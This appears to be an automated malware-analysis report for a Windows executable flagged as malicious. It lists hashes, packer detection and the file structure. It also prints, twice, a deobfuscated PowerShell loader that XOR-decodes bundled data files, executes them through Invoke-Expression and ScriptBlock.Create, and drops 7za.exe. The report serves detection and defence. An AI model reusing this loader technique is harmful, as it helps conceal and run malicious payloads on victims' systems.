Malicious
Malicious

f52f583c314702bbfe3b7d804469351c

PE Executable
|
MD5: f52f583c314702bbfe3b7d804469351c
|
Size: 2.96 MB
|
application/x-dosexec

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
f52f583c314702bbfe3b7d804469351c
Sha1
67020f2f8e494bb2a56807e4a3354120b4077b8a
Sha256
5adec34dbd4c68769ffa5abdb7c0424b5cdf56a4f925e8b87c53cf4a5294afe6
Sha384
0a0033a7e0deadbc1056ae4e327b36aeb0cdfb1fcae603ac83c729b62c410f02fc3d0f7697cbcad85d1d9fb42e159df2
Sha512
27adfc4f0ed1489121999ff58be13e21d496c402f2a9eb1c52702a68c9e38228f721cfba75d520d716a29eeb5fd768f39d66ac8e31e62e67f6a392aa75dc9f7a
SSDeep
49152:IgwRV8UhSoTsnfN9kA0K6zocCchjZcKCKPcYfhVT9Zns80Yoh7M17+PmOv4O3nu4:IgwRV8U6ffr6cCjdCwcyVbnxXoh7OSmw
TLSH
95D5335377A900F4D6F316B0206653AA5D7F9FE12B2606D712883B0B5EF18C7923739A

PeID

Microsoft Visual C++
Microsoft Visual C++ 5.0
Microsoft Visual C++ 6.0 DLL (Debug)
Microsoft Visual C++ v6.0
Microsoft Visual C++ v6.0
Microsoft Visual C++ v6.0 DLL
UPolyX 0.3 -> delikon
File Structure
f52f583c314702bbfe3b7d804469351c
Malicious
7z-stream @ 0x000208A1.7z
Malicious
data.bin
data1.bin
data2.bin
data3.bin
data4.bin
setup.cmd
Malicious
[Deobfuscated PS]
Malicious
Overlay_393a05aa.bin
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rdata
.data
.rsrc
Resources
RT_ICON
ID:0001
ID:1033
RT_GROUP_CURSOR4
ID:0001
ID:1033
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

Overlay extracted: Overlay_393a05aa.bin (2822828 bytes)
Artefacts
Name
 Value
Deobfuscated PowerShell

@({ Write-Output "off%" } )[1] function encode($data, [int] $key) $step = ($key -Rem 10) + 1 $len = 0 return $data | ForEach-Object $key = ($key -Rem 255) + 1 $_ -bxor $key $key += $step $len if (Test-Path "data5.bin" -PathType "Leaf") { $binaryData = [File]::"ReadAllBytes"("data5.bin") $encodedData = encode -data $binaryData -key 10186 Invoke-Expression ([Encoding]::"UTF8"."GetString"($encodedData)) } if (Test-Path "data.bin") { $binaryData = [File]::"ReadAllBytes"("data.bin") $encodedData = encode -data $binaryData -key 10186 & ([ScriptBlock]::"Create"([Encoding]::"UTF8"."GetString"($encodedData))) Start-Sleep -Seconds 3 } $binaryData = [File]::"ReadAllBytes"("data1.bin") $encodedData = encode -data $binaryData -key 10186 [File]::"WriteAllBytes"("7za.exe", $encodedData)
f52f583c314702bbfe3b7d804469351c (2.96 MB)
File Structure
f52f583c314702bbfe3b7d804469351c
Malicious
7z-stream @ 0x000208A1.7z
Malicious
data.bin
data1.bin
data2.bin
data3.bin
data4.bin
setup.cmd
Malicious
[Deobfuscated PS]
Malicious
Overlay_393a05aa.bin
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rdata
.data
.rsrc
Resources
RT_ICON
ID:0001
ID:1033
RT_GROUP_CURSOR4
ID:0001
ID:1033
RT_VERSION
ID:0001
ID:1033
RT_MANIFEST
ID:0001
ID:1033
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
Deobfuscated PowerShell

@({ Write-Output "off%" } )[1] function encode($data, [int] $key) $step = ($key -Rem 10) + 1 $len = 0 return $data | ForEach-Object $key = ($key -Rem 255) + 1 $_ -bxor $key $key += $step $len if (Test-Path "data5.bin" -PathType "Leaf") { $binaryData = [File]::"ReadAllBytes"("data5.bin") $encodedData = encode -data $binaryData -key 10186 Invoke-Expression ([Encoding]::"UTF8"."GetString"($encodedData)) } if (Test-Path "data.bin") { $binaryData = [File]::"ReadAllBytes"("data.bin") $encodedData = encode -data $binaryData -key 10186 & ([ScriptBlock]::"Create"([Encoding]::"UTF8"."GetString"($encodedData))) Start-Sleep -Seconds 3 } $binaryData = [File]::"ReadAllBytes"("data1.bin") $encodedData = encode -data $binaryData -key 10186 [File]::"WriteAllBytes"("7za.exe", $encodedData)

Malicious

f52f583c314702bbfe3b7d804469351c > 7z-stream @ 0x000208A1.7z > setup.cmd
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙